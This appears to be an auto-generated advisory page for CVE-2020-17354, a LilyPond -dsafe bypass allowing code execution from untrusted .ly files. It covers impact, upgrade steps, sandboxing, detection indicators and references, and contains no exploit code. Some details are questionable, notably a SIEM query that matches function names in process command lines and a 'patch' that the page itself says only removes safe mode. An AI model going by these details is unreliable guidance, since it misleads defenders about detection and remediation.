CVE-2020-17354 – CVE-2020-17354 is a security bypass vulnerabili... (How to Fix)

📋 TL;DR

CVE-2020-17354 is a security bypass vulnerability in LilyPond music engraving software that allows attackers to execute arbitrary code despite the -dsafe protection mechanism. Users who process untrusted .ly files with LilyPond versions before 2.24 are affected, particularly when converting files to different formats.

💻 Affected Systems

Products:

LilyPond

Versions: All versions before 2.24

Operating Systems: Linux, Windows, macOS, All platforms running LilyPond

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability affects the -dsafe protection mechanism specifically. In version 2.24+, safe mode is completely removed, so the product no longer attempts to block code execution when processing external files.

📦 What is this software?

Lilypond by Lilypond

View all CVEs affecting Lilypond →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise through arbitrary code execution with the privileges of the LilyPond process, potentially leading to data theft, ransomware deployment, or lateral movement.

🟠

Likely Case

Local privilege escalation or malware execution when processing malicious .ly files from untrusted sources.

🟢

If Mitigated

Limited impact if only trusted .ly files are processed or if LilyPond runs in a sandboxed environment.

🌐 Internet-Facing: LOW - LilyPond is typically not exposed to internet-facing services.

🏢 Internal Only: MEDIUM - Risk exists when processing files from untrusted internal sources or user uploads.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires the victim to process a malicious .ly file. The vulnerability bypasses the -dsafe protection via output-def-lookup or output-def-scope functions.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.24.0 and later

Vendor Advisory: https://lilypond.org/doc/v2.18/Documentation/usage/command_002dline-usage

Restart Required: No

Instructions:

1. Download LilyPond 2.24.0 or later from https://lilypond.org/download.html
2. Uninstall the vulnerable version
3. Install the patched version
4. Verify the installation with 'lilypond --version'

🔧 Temporary Workarounds

Process files in isolated environment

all

Run LilyPond in a sandboxed container or virtual machine when processing untrusted .ly files

docker run --rm -v $(pwd):/data lilypond lilypond input.ly

Avoid processing untrusted files

all

Only process .ly files from trusted sources and validate file contents before processing

🧯 If You Can't Patch

Implement strict file validation and only process .ly files from trusted, verified sources
Run LilyPond with minimal privileges and in isolated environments (containers, VMs, or restricted user accounts)

🔍 How to Verify

Check if Vulnerable:

Run 'lilypond --version' and check if version is below 2.24.0

Check Version:

lilypond --version

Verify Fix Applied:

Run 'lilypond --version' and confirm version is 2.24.0 or higher

📡 Detection & Monitoring

Log Indicators:

Unusual process execution from LilyPond
Failed attempts to access restricted system resources
Unexpected network connections from LilyPond process

Network Indicators:

Outbound connections from LilyPond to unexpected destinations
DNS queries for command and control domains

SIEM Query:

process_name:"lilypond" AND (process_cmdline:*output-def-lookup* OR process_cmdline:*output-def-scope*)

📊 Metadata

CVE ID: CVE-2020-17354

CVSS v3 Score: 8.6 (HIGH)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-863

Published: April 15, 2023

Last Updated: February 6, 2025

🔗 References

http://lilypond.org/doc/v2.18/Documentation/usage/command_002dline-usage Release Notes
https://gitlab.com/lilypond/lilypond/-/merge_requests/1522 Patch,Vendor Advisory
https://lilypond.org/download.html Product
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K43PF6VGFJNNGAPY57BW3VMEFFOSMRLF/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ST5BLLQ4GDME3SN7UE5OMNE5GZE66X4Y/
https://phabricator.wikimedia.org/T259210 Exploit,Third Party Advisory
https://tracker.debian.org/news/1249694/accepted-lilypond-2221-1-source-into-unstable/ Mailing List,Release Notes,Third Party Advisory
https://www.mediawiki.org/wiki/Extension:Score/2021_security_advisory Third Party Advisory
http://lilypond.org/doc/v2.18/Documentation/usage/command_002dline-usage Release Notes
https://gitlab.com/lilypond/lilypond/-/merge_requests/1522 Patch,Vendor Advisory
https://lilypond.org/download.html Product
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K43PF6VGFJNNGAPY57BW3VMEFFOSMRLF/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ST5BLLQ4GDME3SN7UE5OMNE5GZE66X4Y/
https://phabricator.wikimedia.org/T259210 Exploit,Third Party Advisory
https://tracker.debian.org/news/1249694/accepted-lilypond-2221-1-source-into-unstable/ Mailing List,Release Notes,Third Party Advisory
https://www.mediawiki.org/wiki/Extension:Score/2021_security_advisory Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-17354, you might also want to check these: